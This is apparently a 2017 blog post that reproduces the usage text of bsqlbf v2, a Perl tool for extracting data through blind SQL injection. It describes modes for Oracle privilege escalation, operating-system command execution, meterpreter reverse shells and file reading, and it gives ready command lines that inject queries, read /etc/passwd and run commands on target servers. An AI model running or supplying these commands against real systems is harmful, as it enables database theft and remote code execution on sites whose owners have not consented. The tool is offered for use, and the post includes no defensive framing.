Wednesday, October 11, 2017

CODE FOR SQL INJECTION WITH WHITEHAT DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC


Blind Sql Injection Brute Forcer version 2
This is a modified version of 'bsqlbfv1.2-th.pl'. This perl script allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections. Databases supported:
0. MS-SQL
1. MySQL
2. PostgreSQL
3. Oracle
The tool supports 8 attack modes(-type switch):-

Type 0: Blind SQL Injection based on true and false conditions returned by back-end server
Type 1: Blind SQL Injection based on true and error(e.g syntax error) returned by back-end server.
Type 2: Blind SQL Injection in "order by" and "group by".
Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)
Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)
Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java)
Type 6: is O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit
Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs
-cmd=revshell Type 7 supports meterpreter payload execution, run generator.exe first Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions -cmd=revshell Type 8 supports meterpreter payload execution, run generator.exe first

For Type 4(O.S code execution) the following methods are supported:
-stype: How you want to execute command:
SType 0 (default) is based on java..will NOT work against XE.
SType 1 is against oracle 9 with plsql_native_make_utility.
SType 2 is against oracle 10 with dbms_scheduler.

Usage example:
$./bsqlbf-v2.pl -url http://192.168.1.1/injection_string_post/1.asp?p=1 -method post -match true -database 0 -sql "select top 1 name from sysobjects where xtype='U'"
./bsqlbf-v2.3.pl -url http://192.168.1.1/injection_string_post/1.jsp?p=1 -type 4 -match "true" -cmd "ping notsosecure.com"

User Interface:
ubuntu@ubuntu:~$ ./bsqlbf-v2-3.pl



// Blind SQL injection brute forcer \\

//originally written by...aramosf@514.es  \\



// mofified by sid-at-notsosecure.com \\

// http://www.notsosecure.com \\

---------------------usage:-------------------------------------------



Integer based Injection-->./bsqlbf-v2-3.pl - url http://www.host.com/path/script.php?foo=1000 (options)



String Based Injection-->./bsqlbf-v2-3.pl - url http://www.host.com/path/script.php?foo=bar' (options)



------------------------------------options:--------------------------

-sql:          valid SQL syntax to get; version(), database(),

(select  table_name from inforamtion_schema.tables limit 1 offset 0)

-get:          If MySQL user is root, supply word readable file name

-blind:        parameter to inject sql. Default is last value of url

-match:        *RECOMMENDED* string to match in valid query, Default is auto

-start:        if you know the beginning of the string, use it.

-length:       maximum length of value. Default is 32.

-time:         timer options:

0:      dont wait. Default option.

1:      wait 15 seconds

2:      wait 5 minutes



-type:         Type of injection:

0:      Type 0 (default) is blind injection based on True and False responses

1:      Type 1 is blind injection based on True and Error responses

2:      Type 2 is injection in order by and group by

3:      Type 3 !!New!! is extracting data with SYS privileges (ORACLE dbms_export_extension exploit)

4:      Type 4 !!New!! is O.S code execution (ORACLE dbms_export_extension exploit)

5:      Type 5 !!New!! is reading files (ORACLE dbms_export_extension exploit, based on java)



-file: File to read (default C:\boot.ini)



-stype:        How you want to execute command:

0:      SType 0 (default) is based on java..will NOT work against XE

1:      SType 1 is against oracle 9 with plsql_native_make_utility

2:      SType 2 is against oracle 10 with dbms_scheduler

-database:     Backend database:

0:      MS-SQL (Default)

1:      MYSQL

2:      POSTGRES

3:      ORACLE

-rtime:        wait random seconds, for example: "10-20".

-method:       http method to use; get or post. Default is GET.

-cmd:          command to execute(type 4 only). Default is "ping 127.0.0.1."

-uagent:       http UserAgent header to use. Default is bsqlbf 2.3

-ruagent:      file with random http UserAgent header to use.

-cookie:       http cookie header to use

-rproxy:       use random http proxy from file list.

-proxy:        use proxy http. Syntax -proxy=http://proxy:port/

-proxy_user:   proxy http user

-proxy_pass:   proxy http password



---------------------------- examples:-------------------------------

bash# ./bsqlbf-v2-3.pl -url http://www.somehost.com/blah.php?u=5 -blind u -sql "select table_name from imformation_schema.tables limit 1 offset 0" -database 1 -type 1



bash# ./bsqlbf-v2-3.pl -url http://www.buggy.com/bug.php?r=514&p=foo' -method post -get "/etc/passwd" -match "foo"

No comments:

Man in the Rain